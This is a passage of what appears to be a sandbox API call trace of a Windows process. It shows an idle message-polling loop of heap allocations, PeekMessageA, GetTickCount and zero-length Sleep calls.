(HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.494] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.494] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.494] GetTickCount () returned 0x1d26b [0066.494] GetTickCount () returned 0x1d26b [0066.494] GetTickCount () returned 0x1d26b [0066.494] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.494] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.494] GetTickCount () returned 0x1d26b [0066.494] Sleep (dwMilliseconds=0x0) [0066.494] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0066.494] GetLastError () returned 0x0 [0066.494] GetCurrentProcessId () returned 0xa44 [0066.494] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.494] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.494] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.494] GetTickCount () returned 0x1d26b [0066.495] GetTickCount () returned 0x1d26b [0066.495] GetTickCount () returned 0x1d26b [0066.495] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.495] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.495] GetTickCount () returned 0x1d26b [0066.495] Sleep (dwMilliseconds=0x0) [0066.495] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0066.495] GetLastError () returned 0x0 [0066.495] GetCurrentProcessId () returned 0xa44 [0066.495] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.495] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.495] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.495] GetTickCount () returned 0x1d26b [0066.495] GetTickCount () returned 0x1d26b [0066.495] GetTickCount () returned 0x1d26b [0066.495] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.495] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.495] GetTickCount () returned 0x1d26b [0066.495] Sleep (dwMilliseconds=0x0) [0066.495] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0066.496] GetLastError () returned 0x0 [0066.496] GetCurrentProcessId () returned 0xa44 [0066.496] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.496] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.496] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.496] GetTickCount () returned 0x1d26b [0066.496] GetTickCount () returned 0x1d26b [0066.496] GetTickCount () returned 0x1d26b [0066.496] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.496] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.496] GetTickCount () returned 0x1d26b [0066.496] Sleep (dwMilliseconds=0x0) [0066.496] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0066.496] GetLastError () returned 0x0 [0066.496] GetCurrentProcessId () returned 0xa44 [0066.496] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.496] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.496] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.496] GetTickCount () returned 0x1d26b [0066.496] GetTickCount () returned 0x1d26b [0066.496] GetTickCount () returned 0x1d26b [0066.496] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.496] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.497] GetTickCount () returned 0x1d26b [0066.497] Sleep (dwMilliseconds=0x0) [0066.497] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0066.497] GetLastError () returned 0x0 [0066.497] GetCurrentProcessId () returned 0xa44 [0066.497] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.497] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.497] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.497] GetTickCount () returned 0x1d26b [0066.497] GetTickCount () returned 0x1d26b [0066.497] GetTickCount () returned 0x1d26b [0066.497] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.497] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.497] GetTickCount () returned 0x1d26b [0066.497] Sleep (dwMilliseconds=0x0) [0066.497] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0066.497] GetLastError () returned 0x0 [0066.497] GetCurrentProcessId () returned 0xa44 [0066.497] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.498] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.498] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.498] GetTickCount () returned 0x1d26b [0066.498] GetTickCount () returned 0x1d26b [0066.498] GetTickCount () returned 0x1d26b [0066.498] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.498] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.498] GetTickCount () returned 0x1d26b [0066.498] Sleep (dwMilliseconds=0x0) [0066.498] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0066.498] GetLastError () returned 0x0 [0066.498] GetCurrentProcessId () returned 0xa44 [0066.498] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.498] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.498] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.498] GetTickCount () returned 0x1d26b [0066.498] GetTickCount () returned 0x1d26b [0066.498] GetTickCount () returned 0x1d26b [0066.498] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.498] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.498] GetTickCount () returned 0x1d26b [0066.499] Sleep (dwMilliseconds=0x0) [0066.499] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0066.499] GetLastError () returned 0x0 [0066.499] GetCurrentProcessId () returned 0xa44 [0066.499] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.499] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.499] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.499] GetTickCount () returned 0x1d26b [0066.499] GetTickCount () returned 0x1d26b [0066.499] GetTickCount () returned 0x1d26b [0066.499] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.499] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.499] GetTickCount () returned 0x1d26b [0066.499] Sleep (dwMilliseconds=0x0) [0066.499] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0066.499] GetLastError () returned 0x0 [0066.499] GetCurrentProcessId () returned 0xa44 [0066.499] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.499] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.499] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.500] GetTickCount () returned 0x1d26b [0066.500] GetTickCount () returned 0x1d26b [0066.500] GetTickCount () returned 0x1d26b [0066.500] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.500] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.500] GetTickCount () returned 0x1d26b [0066.500] Sleep (dwMilliseconds=0x0) [0066.500] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0066.500] GetLastError () returned 0x0 [0066.500] GetCurrentProcessId () returned 0xa44 [0066.500] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.500] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.500] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.500] GetTickCount () returned 0x1d27a [0066.500] GetTickCount () returned 0x1d27a [0066.500] GetTickCount () returned 0x1d27a [0066.500] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.500] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.500] GetTickCount () returned 0x1d27a [0066.501] Sleep (dwMilliseconds=0x0) [0066.501] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0066.501] GetLastError () returned 0x0 [0066.501] GetCurrentProcessId () returned 0xa44 [0066.501] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.501] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.501] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.501] GetTickCount () returned 0x1d27a [0066.501] GetTickCount () returned 0x1d27a [0066.501] GetTickCount () returned 0x1d27a [0066.501] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.501] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.501] GetTickCount () returned 0x1d27a [0066.501] Sleep (dwMilliseconds=0x0) [0066.501] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0066.501] GetLastError () returned 0x0 [0066.501] GetCurrentProcessId () returned 0xa44 [0066.501] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.502] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.502] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.502] GetTickCount () returned 0x1d27a [0066.502] GetTickCount () returned 0x1d27a [0066.502] GetTickCount () returned 0x1d27a [0066.502] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.502] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.502] GetTickCount () returned 0x1d27a [0066.502] Sleep (dwMilliseconds=0x0) [0066.502] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0066.502] GetLastError () returned 0x0 [0066.502] GetCurrentProcessId () returned 0xa44 [0066.502] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.502] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.502] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.502] GetTickCount () returned 0x1d27a [0066.502] GetTickCount () returned 0x1d27a [0066.502] GetTickCount () returned 0x1d27a [0066.502] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.502] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.502] GetTickCount () returned 0x1d27a [0066.503] Sleep (dwMilliseconds=0x0) [0066.503] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0066.503] GetLastError () returned 0x0 [0066.503] GetCurrentProcessId () returned 0xa44 [0066.503] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.503] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.503] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.503] GetTickCount () returned 0x1d27a [0066.503] GetTickCount () returned 0x1d27a [0066.503] GetTickCount () returned 0x1d27a [0066.503] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.503] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.503] GetTickCount () returned 0x1d27a [0066.503] Sleep (dwMilliseconds=0x0) [0066.503] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0066.503] GetLastError () returned 0x0 [0066.503] GetCurrentProcessId () returned 0xa44 [0066.503] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.503] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.503] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.503] GetTickCount () returned 0x1d27a [0066.503] GetTickCount () returned 0x1d27a [0066.504] GetTickCount () returned 0x1d27a [0066.504] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.504] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.504] GetTickCount () returned 0x1d27a [0066.504] Sleep (dwMilliseconds=0x0) [0066.504] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0066.504] GetLastError () returned 0x0 [0066.504] GetCurrentProcessId () returned 0xa44 [0066.504] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.504] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.504] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.504] GetTickCount () returned 0x1d27a [0066.504] GetTickCount () returned 0x1d27a [0066.504] GetTickCount () returned 0x1d27a [0066.504] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.504] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.504] GetTickCount () returned 0x1d27a [0066.504] Sleep (dwMilliseconds=0x0) [0066.504] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0066.504] GetLastError () returned 0x0 [0066.505] GetCurrentProcessId () returned 0xa44 [0066.505] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.505] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.505] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.505] GetTickCount () returned 0x1d27a [0066.505] GetTickCount () returned 0x1d27a [0066.505] GetTickCount () returned 0x1d27a [0066.505] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.505] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.505] GetTickCount () returned 0x1d27a [0066.505] Sleep (dwMilliseconds=0x0) [0066.505] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0066.505] GetLastError () returned 0x0 [0066.505] GetCurrentProcessId () returned 0xa44 [0066.505] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.505] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.505] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.505] GetTickCount () returned 0x1d27a [0066.505] GetTickCount () returned 0x1d27a [0066.505] GetTickCount () returned 0x1d27a [0066.505] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.506] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.506] GetTickCount () returned 0x1d27a [0066.506] Sleep (dwMilliseconds=0x0) [0066.506] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0066.506] GetLastError () returned 0x0 [0066.506] GetCurrentProcessId () returned 0xa44 [0066.506] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.506] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.506] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.506] GetTickCount () returned 0x1d27a [0066.506] GetTickCount () returned 0x1d27a [0066.506] GetTickCount () returned 0x1d27a [0066.506] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.506] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.506] GetTickCount () returned 0x1d27a [0066.506] Sleep (dwMilliseconds=0x0) [0066.506] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0066.507] GetLastError () returned 0x0 [0066.507] GetCurrentProcessId () returned 0xa44 [0066.507] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.507] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.507] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.507] GetTickCount () returned 0x1d27a [0066.507] GetTickCount () returned 0x1d27a [0066.507] GetTickCount () returned 0x1d27a [0066.507] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.507] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.507] GetTickCount () returned 0x1d27a [0066.507] Sleep (dwMilliseconds=0x0) [0066.507] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0066.507] GetLastError () returned 0x0 [0066.507] GetCurrentProcessId () returned 0xa44 [0066.507] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.507] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.507] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.507] GetTickCount () returned 0x1d27a [0066.508] GetTickCount () returned 0x1d27a [0066.508] GetTickCount () returned 0x1d27a [0066.508] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.508] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.508] GetTickCount () returned 0x1d27a [0066.508] Sleep (dwMilliseconds=0x0) [0066.508] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0066.508] GetLastError () returned 0x0 [0066.508] GetCurrentProcessId () returned 0xa44 [0066.508] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.508] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.508] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.508] GetTickCount () returned 0x1d27a [0066.508] GetTickCount () returned 0x1d27a [0066.508] GetTickCount () returned 0x1d27a [0066.508] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.508] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.508] GetTickCount () returned 0x1d27a [0066.508] Sleep (dwMilliseconds=0x0) [0066.508] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0066.509] GetLastError () returned 0x0 [0066.509] GetCurrentProcessId () returned 0xa44 [0066.509] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.509] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.509] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.509] GetTickCount () returned 0x1d27a [0066.509] GetTickCount () returned 0x1d27a [0066.509] GetTickCount () returned 0x1d27a [0066.509] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.509] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.509] GetTickCount () returned 0x1d27a [0066.509] Sleep (dwMilliseconds=0x0) [0066.509] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0066.509] GetLastError () returned 0x0 [0066.509] GetCurrentProcessId () returned 0xa44 [0066.509] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.509] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.509] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.509] GetTickCount () returned 0x1d27a [0066.509] GetTickCount () returned 0x1d27a [0066.509] GetTickCount () returned 0x1d27a [0066.509] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.509] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.510] GetTickCount () returned 0x1d27a [0066.510] Sleep (dwMilliseconds=0x0) [0066.510] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0066.510] GetLastError () returned 0x0 [0066.510] GetCurrentProcessId () returned 0xa44 [0066.510] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.510] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.510] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.510] GetTickCount () returned 0x1d27a [0066.510] GetTickCount () returned 0x1d27a [0066.510] GetTickCount () returned 0x1d27a [0066.510] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.510] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.510] GetTickCount () returned 0x1d27a [0066.510] Sleep (dwMilliseconds=0x0) [0066.510] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0066.510] GetLastError () returned 0x0 [0066.510] GetCurrentProcessId () returned 0xa44 [0066.510] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.510] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.511] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.511] GetTickCount () returned 0x1d27a [0066.511] GetTickCount () returned 0x1d27a [0066.511] GetTickCount () returned 0x1d27a [0066.511] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.511] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.511] GetTickCount () returned 0x1d27a [0066.511] Sleep (dwMilliseconds=0x0) [0066.511] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0066.511] GetLastError () returned 0x0 [0066.511] GetCurrentProcessId () returned 0xa44 [0066.511] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.511] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.511] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.511] GetTickCount () returned 0x1d27a [0066.511] GetTickCount () returned 0x1d27a [0066.511] CoFreeUnusedLibraries () [0066.511] GetTickCount () returned 0x1d27a [0066.511] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.511] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.511] GetTickCount () returned 0x1d27a [0066.512] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.512] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.512] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, 